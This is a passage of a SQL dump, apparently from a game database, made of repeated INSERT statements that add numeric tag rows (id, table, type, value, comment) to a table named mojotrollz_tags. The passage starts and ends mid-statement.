'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7956, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7956, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7957, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7957, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7975, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7975, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7976, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7976, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7977, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7977, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7978, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7978, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7980, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7980, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7980, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7980, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7980, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7995, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7995, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7996, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7996, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7997, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7997, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7998, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7998, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7998, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7999, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7999, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8015, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8015, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8016, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8016, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8016, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8016, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8016, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8017, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8018, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8018, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8019, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8019, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8020, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8020, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8021, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8021, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8022, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8022, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8023, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8023, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8024, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8025, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8026, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8026, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8035, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8055, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8055, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8075, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8095, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8095, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8095, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8096, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8096, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8115, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8115, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8116, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8117, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8118, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8119, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8119, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8119, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8119, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8119, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8120, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8120, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8120, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8121, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8122, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8123, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8123, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8124, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8124, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8125, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8125, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8126, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8126, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8127, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8127, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8127, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8128, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8128, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8129, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8129, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8130, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8130, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8130, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8131, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8131, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8136, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8136, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8137, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8137, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8138, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8139, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8139, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8140, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8140, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8141, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8141, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8142, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8142, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8143, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8143, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8144, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8144, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8145, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8145, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8146, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8146, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8147, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8147, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8149, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8150, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8150, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8151, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8151, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8152, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8152, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8153, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8153, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8154, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8154, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8155, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8155, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8156, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8157, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8157, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8158, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8158, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8159, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8159, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8160, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8160, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8161, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8161, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8176, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8176, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8177, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8177, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8178, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8178, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8179, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8196, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8196, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8197, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8197, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8198, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8198, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8199, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8199, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8200, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8200, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8201, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8201, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8202, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8202, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8203, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8203, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8204, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8204, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8205, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8205, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8207, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8207, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8208, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8208, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8210, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8210, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8211, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8211, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8212, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8212, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8213, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8213, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8214, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8214, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8215, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8215, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8216, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8216, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8217, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8217, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8218, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8218, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8219, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8219, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8236, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8236, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8256, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8256, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8257, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8257, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8257, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8276, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8276, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8277, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8277, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8278, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8278, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8279, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8279, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8280, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8280, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8281, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8281, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8282, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8282, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8283, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8283, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8284, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8284, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8296, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8296, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8297, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8297, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8298, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8298, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8299, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8299, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8300, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8300, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8301, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8301, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8302, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8302, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8303, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8303, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8304, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8304, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8305, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, 